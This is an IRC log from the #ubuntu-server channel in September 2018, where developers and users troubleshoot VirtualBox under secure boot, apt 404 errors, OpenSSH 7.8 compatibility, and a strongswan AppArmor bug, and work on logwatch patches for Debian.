<ohms360> blackflow, yeah so the serials didn't match up which was strange, so as a test I just tried sql1-production instead and that's giving me the behaviour i desire now, so not sure if systemd-resolve on the clients was caching an old record despite the ttl being shorter or something?
<ohms360> the original subdomain still has issues which is strange, and I didn't spot any conflicting A records
<blackflow> ohms360:  well, query the master NS, verify teh serial corresponds to the one in the zone. then query slaves and see if they see the adequate serial.
<blackflow> ohms360: and those TTLs are a bit too short. not every resolver will respect those.
<ohms360> perhaps i applied with 2s at some point and this could be how that occurred
<blackflow> and the serial will tell you which version of the zone file is being served.
<ahasenack> kstenerud: did you create a salsa account yet?
<kstenerud> ahasenack: yes I've got one
<ahasenack> good
<kstenerud> It looks like all they've done in the past is import from upstream
<ahasenack> you mean the logwatch package repo?
<kstenerud> yeah
<kstenerud> https://salsa.debian.org/debian/logwatch
<ahasenack> can you tell if it matches what the package is atm?
<ahasenack> checking d/changelog, for example
<ahasenack> to fetch a debian package, you can use "pull-debian-source <pkg>"
<kstenerud> Ubuntu us up to date with what's in debian (7.4.3+git20161207-2)
<kstenerud> The current bugs are from after that
<ahasenack> I mean compare the git repo in salsa with the package that is in debian
<kstenerud> yup it's the same
<ahasenack> ok, so at least it's in sync
<lamont> Is it just me, or is virtualbox angry in the current bionic?
<ahasenack> I haven't tried
 * dpb1 wonders why lamont is using virtualbox
<lamont> dpb1: because of reasons
<lamont> ahasenack: if you're of a mind to try, just install virtualbox, and run it... it errors out in init for me.
<lamont> % virtualbox
<lamont> VirtualBox: Error -610 in supR3HardenedMainInitRuntime!
<lamont> VirtualBox: dlopen("/usr/lib/virtualbox/VBoxRT.so",) failed: <NULL>
<dpb1> lamont: gluton for punishment still I see?
<dpb1> :)
<lamont> and then suggests that reinstalling virtualbox might help (doesn't, but thanks for pretending this is windows...)
<jerichowasahoax> >using oracle software
 * ahasenack gets a nasty secure boot dialog
<ahasenack> lamont: the service failed to start, I wonder if it's because of the kernel module
<ahasenack> [25301.665651] Lockdown: Loading of unsigned modules is restricted; see man kernel_lockdown.7
<lamont> ahasenack: that's what everything says: due to kernel module version mismatch
<lamont> ahasenack: ah! ta
<ahasenack> I can't reboot now I'm adraid
<lamont> No manual entry for kernel_lockdown
<ahasenack> right :/
<ahasenack> https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1767971
<ubottu> Launchpad bug 1767971 in linux (Ubuntu Bionic) "No such man page: kernel_lockdown.7" [Medium,Triaged]
<dpb1> ahasenack: you bricked your box?
<ahasenack> no
<ahasenack> but it told me I would have to type a password the next boot if I want this module loade
<ahasenack> d
<dpb1> WHAT
<dpb1> oops
<dpb1> WAT
<lamont> Sep  4 12:41:13 tigernut kernel: [   78.991989] PKCS#7 signature not signed with a trusted key
<lamont> ahasenack: so... how do I turn that off, like an idiot?
<ahasenack> lamont: secure boot is a bios setting
<dpb1> right
<ahasenack> that particular message is not what is blocking things, though
<dpb1> you can also just boot into an unsigned kernel?
<ahasenack> it's the lockdown one
<lamont> grep -i lockdown /var/log/kern.log shows nothing
<dpb1> lamont: 18.04?
<ahasenack> lamont: did you get a debconf dialog during the installation of virtualbox saying something along the lines that your machine is in secure boot mode
<lamont> Description:	Ubuntu 18.04.1 LTS
<ahasenack> if not, then it's not what I hit here
<ahasenack> you should be good to go then. Is the module loaded?
<lamont> ahasenack: not that I recall
<lamont> Loading new virtualbox-5.2.10 DKMS files...
<lamont> Building for 4.15.0-33-generic
<lamont> Building initial module for 4.15.0-33-generic
<lamont> Secure Boot not enabled on this system.
<ahasenack> ok, looking good
<lamont> I have this file: /lib/modules/4.15.0-33-generic/kernel/ubuntu/vbox/vboxguest/vboxguest.ko
<lamont> sudo modprobe vboxguest
<lamont> modprobe: ERROR: could not insert 'vboxguest': No such device
<lamont> -tigernut 322 : sudo insmod /lib/modules/4.15.0-33-generic/kernel/ubuntu/vbox/vboxsf/vboxsf.ko
<lamont> insmod: ERROR: could not insert module /lib/modules/4.15.0-33-generic/kernel/ubuntu/vbox/vboxsf/vboxsf.ko: Unknown symbol in module
<lamont> -tigernut 323 : sudo insmod /lib/modules/4.15.0-33-generic/kernel/ubuntu/vbox/vboxguest/vboxguest.ko
<lamont> insmod: ERROR: could not insert module /lib/modules/4.15.0-33-generic/kernel/ubuntu/vbox/vboxguest/vboxguest.ko: No such device
<ahasenack> I can't until I reboot
<ahasenack> # modprobe vboxdrv
<ahasenack> modprobe: ERROR: could not insert 'vboxdrv': Required key not available
<lamont> ahasenack: oh well
 * lamont fires up a xenial vm to see if it likes him any more
<ahasenack> lamont: you were trying this on a vm?
<ahasenack> I don't know if virtualbox works in another vm
<michael2> hi, I keep getting 404 when running aptitude install, does anyone know whats causes this?
<michael2> e.g. Im getting output like:
<michael2> 2% [Working]E: Failed to fetch http://security.ubuntu.com/ubuntu/pool/universe/f/ffmpeg/libavcodec-ffmpeg56_2.8.14-0ubuntu0.16.04.1_i386.deb: 404  Not Found [IP: 198.199.99.226 80]
<lamont> ahasenack: virtualbox (at least with the image I'm using, requires vmx or equiv, so it throws a fit in a vm.)  OTOH, it works just fine up to that point (as in virtualbox launches) on both a current xenial and bionic machine.
<RoyK> michael2: tried apt update?
<RoyK> or aptitude or apt-get
<lamont> ahasenack: or maybe it only tries to dlopen() after it determines that the flags are right... I haven't looked that far yet.
<michael2> RoyK: will try that now (embarrassing I didn't thik of that already!)
<lamont> ahasenack: the vm comment 3 hours ago was the first time I tried it in a vm
<lamont> before that was on my desktop
 * lamont really doesn't want to boot a livecd just to test current-bionic
<lamont> but that may be a thing
<sbeattie> michael2: aptitude update should fix it, as the version of ffmpg in xenial is now 7:2.8.15-0ubuntu0.16.04.1
<michael2> thanks. fundamentally I don't understand what the error actually _means_ - i.e. what is going on? so I know how to fix next time?
<michael2> oh I thought the message was 404'ing against the IP address, heeh
<michael2> hehe. but apt is actually saying "I can't find that package"
<michael2> does that mean ubuntu package maintainers are uploading - then later removing packages from apt repo/server?
<lamont> it means that packages are being superseded.
<michael2> right, but if my - outdated - local index literally can't install a package, superceded or not - that tells me - its been completely removed from the archive?
<lamont> that's what happens when a package is superseded.  TBF, it gets a 24ish hour stay of execution, IIRC
<lamont> the maintainers aren't removing it, the archive management code is.
<tomreyn> this version of the package you tried to install (due to your outdated local index) was removed server-side
<michael2> why remove it? what not just append the new package - apt will automatically select the new one anyway
<lamont> michael2: if you really want that version, you can likely find it on launchpad in the full publishing history.
<lamont> michael2: if you don't remove it, then you lose mirrors
<lamont> the archive is already huge
<michael2> lose mirrors?
<lamont> people stop mirroring when you eat their disks
<michael2> ah - you exceed the storage capacity of some ISP who is mirroring. ok that makes sense
<lamont> as it sits, it's roughly a terabyte.
<michael2> yeah people's appetite for software is insatiable - hehe
<lamont> generally speaking, I expect that the stay of execution is around 12 hours, to let slow links finish their dist-upgrade download even when the archive is in heavy churn
<lamont> ahasenack: confirmed: it doesn't bother to call dlopen() in the vm, so basically nothing from that test.
<RoyK> michael2: you can use unattended-upgrades to automatically update (or upgrade) apt
<RoyK> works well
<michael2> I dont trust that - ever since it broke a server - I only upgrade packages manually these days
<RoyK> then use it to automtically update apt
<RoyK> not upgrade
<RoyK> I've been using that for some time on several machines - it works
<michael2> ah gotcha
<RoyK> !unattended-upgrades
<RoyK> dumb bot
<lamont> michael2: if you still want to do it manually, a daily cronjob that does an "apt-get update; apt-get -dy dist-upgrade" at least makes it so that you don't have to wait for all the debs to download.
<RoyK> lamont: no reason to reinvent the wheel - unattended-upgrades works well
<michael2> isn't there a systemd timer setup to already do that?
<lamont> RoyK: Agreed. I use them on several machines.  If michael2 wants to stay in the dark ages, at least there are ways to reduce the pain.
<lamont> michael2: yeah, it's called "unattended upgrades"
<michael2> I prefer to live in the 15th century - "the renaissance period"
 * lamont disappears for a while to boot a live cd and see if bionic.1 is hateful out of the box, or if his machien is special.
 * RoyK hands michael2 a sledgehammer to help him debug his laptop
<michael2> RoyK: a pair of jumper cables should do it
<michael2> systemctl list-timers tells me "apt-daily.service" is already installed - and runs every morinig 8am
<RoyK> perhaps it needs to be configured?
<michael2> configured? isn't invoking the service enough?
<RoyK> dunno - google it
#ubuntu-server 2018-09-05
<lamont> ahasenack: interestingly, livecd + packages seems to work, but I don't think it did the dlopen call.  same kernel on my installed desktop still results in failure.  Now comes the fun of looking at file diffs. sigh.
<lamont> ahasenack: turns out that error 610 from virtualbox is bitching about non-root owner of /usr /usr/lib or /usr/lib/vitualbox.  Thanks for the classy error messages, Oracle.
<cpaelzer> good morning
<jamespage> coreycb: newer snapshots of py2.7, 3.6 and 3.7 all generate that same hacking test failure in nova
<jamespage> coreycb: life is to short so I've skipped it across all versions
<jamespage> but something changed
<coreycb> jamespage: ok
<coreycb> jamespage: there are some dep8 failures due to curl not being available in arm. i'll fix those up.
<coreycb> jamespage: it seems that some of the nasty py3.7 bugs may be fixed in py3.7 itself.  i'll check and work with doko on it. i was hitting similar ones to this on a handful of projects: https://storyboard.openstack.org/#!/story/2003186
<jamespage> coreycb: have you worked on any py3 switchovers for components yet?
<jamespage> in the charms that is
<coreycb> jamespage: not for the charms yet, but planning to start once rocky cleanup is done
<jamespage> coreycb: ok I'll start poking on a few - cinder first
<coreycb> jamespage: ok, thanks
<ahasenack> hmm
<ahasenack>  /tmp/autopkgtest.cRVUhE/build.cWY/src/debian/tests/ldap-user-group-krb5-auth: 57: /tmp/autopkgtest.cRVUhE/build.cWY/src/debian/tests/ldap-user-group-krb5-auth: debian/tests/login.exp: Permission denied
<ahasenack> it has +x
<ahasenack> maybe it's mounted as noexec
<ahasenack> it worked locally in qemu/kvm
<cpaelzer> maybe it looses +x on the way?
<cpaelzer> can you for testing chmod it before calling?
<cpaelzer> or pass it like $ expect -f foo.exp
<ahasenack> the latter would be my next attempt
<ahasenack> but it worked here
<ahasenack> kvm and lxd
<cpaelzer> odd
<cpaelzer> I also thought that there should be no difference
<ahasenack> also worked in a debian lxd
<cpaelzer> which architecture was the fail ahasenack
<ahasenack> all
<cpaelzer> wow
<ahasenack> https://bileto.ubuntu.com/excuses/3399/cosmic.html
<ahasenack> hm, maybe I need -f in the shebang line
<cpaelzer> maybe dash/bash/sh is different there?
<cpaelzer> is expect a test dependency?
<cpaelzer> hmm, yes it is
<cpaelzer> ahasenack: http://paste.ubuntu.com/p/Q3gXJv5zGB/ ?
<ahasenack> yeah
<ahasenack> better go all the way, or else verifying all alternatives will take a whole day
<cpaelzer> yep
<cpaelzer> I also found the -- in the man page
<cpaelzer> so I added i
<cpaelzer> t
<ahasenack> cpaelzer: snapper upstream took the armhf build fix patch
<ahasenack> another delta will bite the dust, soon
<jamespage> coreycb: ok so cinder looks promising - got all but on of the tempest.api.volume tests to pass first run
<coreycb> jamespage: not bad
<jamespage> coreycb: https://review.openstack.org/600027
<cpaelzer> ahasenack: \o/
<coreycb> jamespage: commented
<jamespage> coreycb: good question about clearing out the py2 cruft
<jamespage> coreycb: we can purge out any python-* packages from the original installed pkgs; however we'll need an autoremove helper to then purge out any deps!
<coreycb> jamespage: ick
<jamespage> coreycb: meh it kinda needs to happen
<jamespage> coreycb: for example python-cinder would still be installed, but is not mention anywhere in the charm
<coreycb> jamespage: worth noting this is likely just a rockey issue. stein will be easier. we can just make py3 alternatives have precedence.
<coreycb> rocky
<jamespage> agreed
<kstenerud> ahasenack: Is there more to do with logwatch re: getting debian's attention?
<cpaelzer> kstenerud: does "knowing the maintainer well" count?
<ahasenack> kstenerud: did you create a merge request?
<ahasenack> kstenerud: good morning :)
<ahasenack> kstenerud: while I have you, keep an eye on http://people.canonical.com/~ubuntu-archive/proposed-migration/update_excuses.html
<ahasenack> kstenerud: your bind9 sponsored upload is in there
<jamespage> coreycb: https://github.com/juju/charm-helpers/pull/209
<ahasenack> kstenerud: I think you can move the 1769440 card to done, bind9 migrated. Did you check that proposed-migration page in time, while bind9 was still in there? Just so you know the process
<kstenerud> ahasenack: Yes I saw it with tests passed and expected fails yellow
<ahasenack> ok
<ahasenack> kstenerud: that bind9 bug, it needs an sru to bionic now :)
<ahasenack> feel free to use the same card I mentioned above, or create a new one for the sru work
<jamespage> coreycb: do you think missing curl might be the issue on the glance autopkgtest failures as well?
<coreycb> jamespage: yes that's the problem. i have a couple pkgs testing here: https://bileto.ubuntu.com/#/ticket/3125
<jamespage> coreycb: ack will leave in your more than capable hands!
<coreycb> jamespage: ha!
<dpb1> kstenerud: did we hear back from debian on logwatch?
<kstenerud> No, I hadn't done the change in their git repo. Working on that now
<kstenerud> ahasenack: Is there a special procedure for making patches to salsa? Like tests to run etc?
<ahasenack> kstenerud: nothing standard
<ahasenack> if there are dep8 tests in the package, then I would run them
<ahasenack> otherwise, I would show how the change was tested
<ahasenack> don't forget it's debian, not ubuntu, when copying logs and such
<kstenerud> So basically I just fork, make the same 2 commits, then merge req?
<ahasenack> luckily it's easy to use a debian container
<ahasenack> yeah, and I would leave the debian release as "UNRELEASED" in d/changelog, since the commit is not necessarily tied to a new upload
<ahasenack> let them sort that out
<ahasenack> but do use dch, and format d/changelog approprietly
<kstenerud> dch?
<ahasenack> try it :)
<kstenerud> oh hah cool :)
<ahasenack> I suggested dch this time, instead of git-ubuntu.reconstruct-changelog, because git-ubuntu wouldn't work in a debian container
<ahasenack> not out-of-the-box at least
<kstenerud> Oh, the version is labeled logwatch (7.4.3+git20161207-2ubuntu1)
<kstenerud> should it have the ubuntu1 at the end?
<ahasenack> nope
<ahasenack> well, not in a debian merge request for sure
<ahasenack> and, if the current d/changelog already has an entry with UNRELEASED, then don't create a new (versioned) one, just add your bit to the existing one
<ahasenack> there is a format for that, you can find it on other changelog files if you look, it's like [Some Name]\n  * change
<kstenerud> OK so I'm basically doing:
<kstenerud>   * sshd: ignore disconnected from user USER. (closes: 855539)
<kstenerud> 855539 being their bug report on this
<ahasenack> kstenerud: yes, but please mention the file you are changing
<ahasenack> like, full path
<dpb1> kstenerud: (just curious on logwatch, since we hadn't reached out before)
<ahasenack> cpaelzer: sea of green! https://bileto.ubuntu.com/excuses/3399/cosmic.html
<ahasenack> cpaelzer: calling expect -f <script>
<ahasenack> instead of <script> directly
<cpaelzer> ok, then that shall be the solution
<SuperLag> I'm trying to set up an Ubuntu VM on my local machine. It'll use NAT, and share the existing connection, but I'd like to make it a static IP, so when the term opens and my SSH-on-open command runs, it connects automatically. I'm not sure how do set up a static IP during the install process.
<subvhome> Can someone direct me to a resource that can help me configure my ubuntu server to login automatically (no GUI)
<subvhome> nevermind figured it out :)
<dpb1> SuperLag: are you using the 18.04.1 LTS server install?
<SuperLag> yes
<SuperLag> dpb1: yes
<dpb1> SuperLag: in the network config screen, you can choose a static IP
<ahasenack> kstenerud: in your logwatch salsa mp,
<ahasenack> kstenerud: the file you should mention in d/changelog is the patch file you are adding, not the file that the patch itself is changing
<ahasenack> kstenerud: so, it should be d/p/ssh-ignore-disconnected.patch
<ahasenack> (or debian/patches/...)
<kstenerud> ah ok
<kstenerud> ahasenack: For the strongswan repro case, I'm going to have to set up a fairly complicated thing with config files and scripts. How would I fit that to the bug report and MP?
<ahasenack> kstenerud: strongswan related to logwatch?
<ahasenack> or that other mp which was started by a community member?
<kstenerud> the other mp
<kstenerud> I'll need to set up a vpn server and client in separate machines and then test with different versions on the client side
<ahasenack> it is complicated indeed. I would suggest to just run the dep8 tests, they cover a lot already
<ahasenack> I mean,
<ahasenack> not the depp8 tests
<ahasenack> the qa-regression-tests
<ahasenack> https://launchpad.net/qa-regression-testing
<ahasenack> inside the scripts directory, there is a test-strongswan.py script
<ahasenack> with instructions
<ahasenack> this mp of mine, from some days ago, went through them. The description of the mp has pastebins showing these scripts being run: https://code.launchpad.net/~ahasenack/ubuntu/+source/strongswan/+git/strongswan/+merge/353642
<ahasenack> kstenerud: btw, your logwatch salsa mp, you still have the old s/s/ path in the changelog entry, not sure if you saw that. I see you changed the mp title
<kstenerud> ahasenack: how were you able to see the diffs on salsa? I can't find a button for it
<kstenerud> also, for that entry, I was copying from previous entries in the changelog, like: s/s/amavis: Fix perl warning "redundant argument in sprintf".
<kstenerud> should I change it to the other style in changelog?
<ahasenack> kstenerud: there are three tabs in the MR page
<ahasenack> discussion, commits, changes
<ahasenack> it defaults to discussion
<ahasenack> kstenerud: about s/s, hm, I see the previous entries. It looks odd
<ahasenack> I'm fine either way then, as you prefer
<kstenerud> ahasenack: How do I initiate a qa-regression test?
<ahasenack> kstenerud: branch that code, cd into scripts/
<ahasenack> there is a readme file in that dir
<ahasenack> start with     $ sudo ./install-packages test-foo.py
<ahasenack> that will install dependencies needed by that particular test-<foo>.py script
<ahasenack> then read instructions on that script test
<ahasenack> er, test script
<kstenerud> All I see are a bunch of *.c files in scripts
<kstenerud> find . -name install-packages returns nothing
<ahasenack> kstenerud: "that code" -> https://launchpad.net/qa-regression-testing
<ahasenack> is that what you branched?
<ahasenack> https://code.launchpad.net/qa-regression-testing
<kstenerud> ahasenack: Is this meant to be cloned and run from within a vm?
<ahasenack> kstenerud: yes, and it's meant to be run on the machine where the software you are testing is installed
<ahasenack> so a vm or lxd is best, yes
<sdeziel> cpaelzer: re LP: #1789551, I'm not sure don't understand why Xenial would be harder to tackle than Bionic. Isn't is just a matter of calling "seccomp_attr_set(ctx, > SCMP_FLTATR_CTL_TSYNC, 1)" irrespective of whitelist vs blacklist?
<ubottu> Launchpad bug 1789551 in qemu (Ubuntu Bionic) "qemu: CVE-2018-15746: seccomp: blacklist is not applied to all threads" [High,Triaged] https://launchpad.net/bugs/1789551
<ahasenack> kstenerud: in the command line from that MP I pasted you earlier,
<ahasenack> sudo ./test-strongswan.py $test 192.168.122.78 10.0.2.0/24 192.168.122.42 10.0.1.0/24 -v
<ahasenack> 192.x.x.x is the libvirt network where the vm is on
<ahasenack> 10.0.2 and 10.0.1 are made up networks, no config at all. the test script will set that up
<kstenerud> ok
<ScottE> Oh boy, this is going to be fun... We're finding users who upgrade to openssh 7.8 can no longer ssh to our ubuntu servers due to some strictness in the new openssh version. I created https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1790963 with links to the same issue found in other Linux distro. It's unclear what the right fix is, but thought I would mention it here because it's likely to have
<ubottu> Launchpad bug 1790963 in openssh (Ubuntu) "Unable to connect with openssh 7.8 client" [Undecided,Confirmed]
<ScottE> wide blast radius.
<blackflow> ScottE: not sure I see this problem here
<blackflow> ScottE: hmmm, wait, 7.8 clients when connecting to older clients, you say?
<ScottE> blackflow Basically the 7.8 client is not (fully) compatible with openssh version <7.8
<TJ-> ScottE: according to the release notes, the breakage should only occur in non-default configurations. Is that the case here, or is the Ubuntu default for 7.6/7.7 causing the issue
<blackflow> ScottE: yea I thought I was running 7.8 but I'm not, it's 7.6. I'm gonna test now with 7.8 from Fedora
<ScottE> You very well could be correct there TJ- we're still in the process of trying to figure that out
<TJ-> here, on 18.04 with v7.6, "sshd -T" with no sysadmin over-ride shows "hostbasedacceptedkeytypes ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519-cert-v01@openssh.com,ssh-rsa-cert-v01@openssh.com,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-512,rsa-sha2-256,ssh-rsa"
<TJ-> And pubkeyacceptedkeytypes ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519-cert-v01@openssh.com,ssh-rsa-cert-v01@openssh.com,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-512,rsa-sha2-256,ssh-rsa
<TJ-> seems like a daft change for openssh to make though; keeping the option name with *KeyTypes but changing the semantics to mean *SignatureAlgorithms! Recipe for confusion there
<ScottE> Yeah, it's looking very likely that our custom server config (with the intent to improve security) is causing the breakage here. I never did suspect it to be an Ubuntu bug per se
<ahasenack> so the option is still called PubkeyAcceptedKeyTypes, but now its value is a signature algorithm instead of a key type?
<blackflow> ScottE: yeah, default configs work just fine
<blackflow> 7.8p1 client from Fedora connecting to 7.6 Ubuntu and 7.2 FreeBSD
<ScottE> blackflow great, thanks for the confirmation on that - that will greatly limit who runs into this right there
<TJ-> ahasenack: that's seems to be correct
<TJ-> ahasenack: I guess (some of) the values were always signature algorithms, not key-types
<TJ-> ScottE: well, your changes did improve security - no-one could connect :)
<kstenerud> ahasenack: None of the tests fail in bionic. I'm not really sure how to cause the issue
<ScottE> TJ- haha
<ahasenack> kstenerud: did you see apparmor denied messages in dmesg?
<kstenerud> nope
<ahasenack> kstenerud: then ok, proceed with just the dep8 results, we will rely on the reporter for this one
<kstenerud> ok
<TJ-> did I see mention of a possible strongswan problem? (wondering if it's something I've hit recently!)
<ahasenack> TJ-: https://code.launchpad.net/~fermulator/ubuntu/+source/strongswan/+git/strongswan/+merge/353423
<ahasenack> bug being #1786250
<ahasenack> kstenerud: wait, was apparmor even enabled for strongswan? It might be an optional apparmor profile
<TJ-> ahasenack: hmmm, I think I've been seeing NetworkManager reporting the same
<kstenerud> How do I check?
<sdeziel> strongswan's apparmor is enabled by default IIRC
<sdeziel> kstenerud: aa-status
<sdeziel> you should see charon as being confined
<TJ-> ahhh, no, slightly different. I've been seeing: <warn>  [1536149701.2078] error requesting auth for org.freedesktop.NetworkManager.enable-disable-connectivi
<TJ-> ty-check: Authorization check failed: Failed to open file â/proc/1554/statusâ: No such file or directory
<TJ-> I see "enforced" for /usr/lib/ipsec/charon
<kstenerud> sdeziel: It says charon is unconfined
<ScottE> So this openssh issue might be only when using certificates (which we do) - compiling 7.8 with the same config works fine - so it appears not our customization - I'll update the bug with specific mention around certificates
<SuperLag> RHEL has a kickstart configurator that'll give you at the very least a template to work from for kickstart files. Is there an Ubuntu equivalent for preseed files?
#ubuntu-server 2018-09-06
<mason> SuperLag: https://wiki.ubuntu.com/fai-in-ubuntu
<mason> SuperLag: Ah, and https://landscape.canonical.com/
<mike802> hey, so i have phpmyadmin up and i'm trying to connect to mysql database and i'm getting an error
<mike802> mysqli_real_connect() connection refused
<mike802> #2002 connection refused; the server is not responding
<mike802> apache2 seems to be up and so does my mysql database
<mike802> so, i checked and i can log on with mysql -u guest etc.....
<mike802> while i can't log on with -u guest -wrong password
<mike802> so, i think i added a guest account to my database correctly
<cpaelzer> good morning
<lordievader> Good morning
<xrandr_mac> Hi there. I am having an issue connecting a gluster node on ubuntu to a gluster server running CentOS
<xrandr_mac> I keep getting PEER_CONNECT and PEER_DISCONNECT events in the logs
<jamespage> coreycb: errant /usr/etc/<project> directories in python{3}-project's are nice for upgrades
<jamespage> fixed cinder
<coreycb> jamespage: testing py2->py3?
<coreycb> upgrades
<jamespage> coreycb: yeah
<kstenerud> ahasenack: It looks like app armor isn't enabled in the test environments for strongswan
<ahasenack> kstenerud: "test environment" is just a vm you brought up, right? The test itself isn't messing with apparmor probably
<ahasenack> kstenerud: have you tried enabling it before running the test?
<kstenerud> ahasenack: aa-enabled says yes, but then aa-status gives:
<kstenerud> 1 processes are unconfined but have a profile defined.                                          â
<kstenerud>    /usr/lib/ipsec/charon (1769)                                                                 â
<sdeziel> kstenerud: sometimes there are races with systemd and apparmor profile loading
<sdeziel> kstenerud: have you tried "service strongswan restart" ?
<kstenerud> that did it :)
<ahasenack> interesting bug
<kstenerud> which is why the regression tests didn't catch this I guess
<sdeziel> kstenerud: all my strongswan deployments have Apparmor enabled and I never ran into this missing /proc/$PID/fd/ read rule. I think this is very specific to the reporter's config
<sdeziel> ahasenack: I think the way to avoid this race would be to either tell systemd to apply an Apparmor profile as part of the unit file (not really applicable for stronswan) or put a dependency so that apparmor loading is done before starting the strongswan service
<ahasenack> sdeziel: can't an apparmor profile for a service be enabled without restarting the service? I would think that's possible
<ahasenack> kstenerud: btw, you can update the postfix sru card, did you see the emails?
<kstenerud> ahasenack: Is that the bug tracker email?
<ahasenack> launchpad email, yes. I got it, as I'm subscribed to that bug
<sdeziel> ahasenack: according to man 7 apparmor, no: "Profiles are applied to a process at exec(3) time ; an already running process cannot be confined."
<sdeziel> killing charon would probably have it started back by systemd but that's a bit intrusive too
<kstenerud> hmm that's weird... When I try loading the testing env on cosmic, there's no aa-profile cmd
<kstenerud> ahasenack: I've run the tests on cosmic and they work, so the bug was fixed somewhere between 5.6.2 and 5.6.3
<kstenerud> so this would be a backport fix to bionic, right?
<ahasenack> kstenerud: did you see the error before?
<kstenerud> I saw the error when running a bionic vm
<ahasenack> kstenerud: check /etc/apparmor* when installing 5.6.3 in cosmic to see if the changed profile line is in there
<ahasenack> it might be in an abstraction directory
<kstenerud> ahasenack: I don't see it applied in /etc/apparmor.d
<ahasenack> hm
<ahasenack> what was the line again?
<ahasenack> from the patch
<kstenerud> +  @{PROC}/@{pid}/fd/        r,
<kstenerud> right after    /var/lib/strongswan/*     r,
<kstenerud> in usr.lib.ipsec.charon
<ahasenack> did you check the abstractions directory?
<kstenerud> yes. Didn't see anything about charon in there
<ahasenack> it doesn't have to be about charon, it could be a generic permission, for all services to use if needed
<ahasenack> abstractions/bash:  @{PROC}/@{pid}/mounts            r, <-- example
<ahasenack> well, bad example
<kstenerud> OK. I don't see anything about @{PROC}/@{pid}/fd/ except in ubuntu-browsers
<ahasenack> abstractions/base:  @{PROC}/@{pid}/{maps,auxv,status} r, <- more interesting one (generic)
<ahasenack> yeah
<ahasenack> then either it's not trying to read that, or apparmor isn't applied
<kstenerud> when I aa-status, I see that /usr/lib/ipsec/charon is in enforce mode
<kstenerud> oh hang on. that's just profile
<ahasenack> you can also use ps faxwZ
<kstenerud> there we go, the process is now in enforce mode
<ahasenack> the Z option will add a column about confinement to each row
<kstenerud> OK, running in enforce mode the test succeeded
<ahasenack> and you got a denied?
<kstenerud> nope
<kstenerud> I'll try a second run with bionic. The tests didn't even finish on that
<ahasenack> ok
<ahasenack> vms or containers?
<kstenerud> vms
<ahasenack> good
<ahasenack> I prefer vms when dealing with apparmor
<sdeziel> with IPsec, VMs are needed for 95% of the use cases anyway
<ahasenack> yeah
<coreycb> jamespage: hit the same thing with heat. fixing.
<jamespage> coreycb: hurrah
<kstenerud> ahasenack: Hmm strange it didn't fail this time
<jamespage> coreycb: I might run a quick non-charm test
<coreycb> jamespage: that's what i'm doing. just looping through all the packages and upgrading.
<jamespage> coreycb: oh ok
 * jamespage stands backj
<kstenerud> ahasenack: I'm doing this to test: https://pastebin.ubuntu.com/p/w4HQchZVfH/
<ahasenack> kstenerud: and do you see the denied message in bionic?
<ahasenack> and the test failing?
<kstenerud> No, not this time
<kstenerud> Last time I did get a failed test
<kstenerud> oh wait wtf... charon isn't in enforce mode again
<kstenerud> oh nm. The tests shut down strongswan
<kstenerud> So I can't trigger the bug from these tests. I might have triggered something else beause I was trying different ways to do it
<dpb1> kstenerud: are you "taking over" that strongswan MP that we received?
<kstenerud> yes
<dpb1> k
<kstenerud> But I can't trigger the bug he had, so I can't verify the fix
<dpb1> hrmph
<kstenerud> I did see a similar looking fix in upstream strongswan, though
<dpb1> was there a proper bug for it?
<dpb1> lp bug
<kstenerud> Our bug is https://bugs.launchpad.net/ubuntu/+source/strongswan/+bug/1786250
<ubottu> Launchpad bug 1786250 in strongswan (Ubuntu) "strongswan (charon) is rejected by apparmor to read /proc/<PID>/fd" [Undecided,In progress]
<kstenerud> Not sure if the upstream fix was from that or a private bug report to the authors
<ahasenack> kstenerud: what is the upstream change that could be related?
<kstenerud> oh wait no. I'm getting confused by logwatch stuff :P
<kstenerud> So no, there's no upstream fix. This is an apparmor and strongswan issue
<ahasenack> ok
<ahasenack> well, I don't have a handy strongswan config to check this out more carefully
<ahasenack> if you think you could get to one with the hints from the test, go ahead, we could use it, as I'm sure this is not the last strongswan bug we will have to handle
<ahasenack> but beware the rabbit hole :)
<ahasenack> and the reporter went MIA
<ahasenack> maybe what's needed is a service restart after the vpn is established, or a reload, or some other interaction with the daemons
<ahasenack> or a logrotate to kick in
<ahasenack> etc
<kstenerud> ok, I'll see what I can come up with
<sdeziel> I think the issue is somehow related to /etc/resolv.conf handling
<TJ-> If it would help, I'm currently working on a strongswan deployment, and might be in a position to try to reproduce the issue, if it'd help
<TJ-> I've been kicking a Cisco 860 series that doesn't want to play nicely with L2TP/IPsec too, due apparently to only offering IKE 3des-sha1-modp1024
<kstenerud> TJ-: Yes, I just need a setup that I can put in a repro case
<TJ-> kstenerud: remind of the bug number again, I'm on a different PC than when it was mentioned yesterday
<kstenerud> https://bugs.launchpad.net/ubuntu/+source/strongswan/+bug/1786250
<ubottu> Launchpad bug 1786250 in strongswan (Ubuntu) "strongswan (charon) is rejected by apparmor to read /proc/<PID>/fd" [Undecided,In progress]
<TJ-> kstenerud: I'll spend some time on it over the weekend whilst the office here is empty, see what I can come up with. It looks like the ipsec config hasn't been provided by the user, and the 16.04>18.04 d-r-u is likely the culprit
<kstenerud> Great! Thanks!
<TJ-> kstenerud: so I don't waste time, in the bug and MP there's talk of not being sure when 'it' was introduced but to me it isn't entirely clear what 'it' is! Is that referring to the apparmor profile change/difference, or accessing /proc/self/fd/ ?
<kstenerud> TJ-: It worked in xenial, broke in bionic, and the fix apparently is to add @{PROC}/@{pid}/fd/        r, to usr.lib.ipsec.charon
<kstenerud> under /etc/apparmor.d
<TJ-> kstenerud: yes, I understood that bit, but the 'it' referred to - was it adding the apparmor profile, or strongswan reading /proc/self/fd/ ? From what I can see from the history, /proc/self/fd/ was added in 2015 before the xenial version was released so should be in that version, but the debian/usr.lib.ipsec.charon apparmor profile was added in 2016/2017 via an import from Debian.
<kstenerud> I think it was strongswan attempting to read /proc/self/fd/
<TJ-> Yes, that was introduced with commit b410d7f8ff
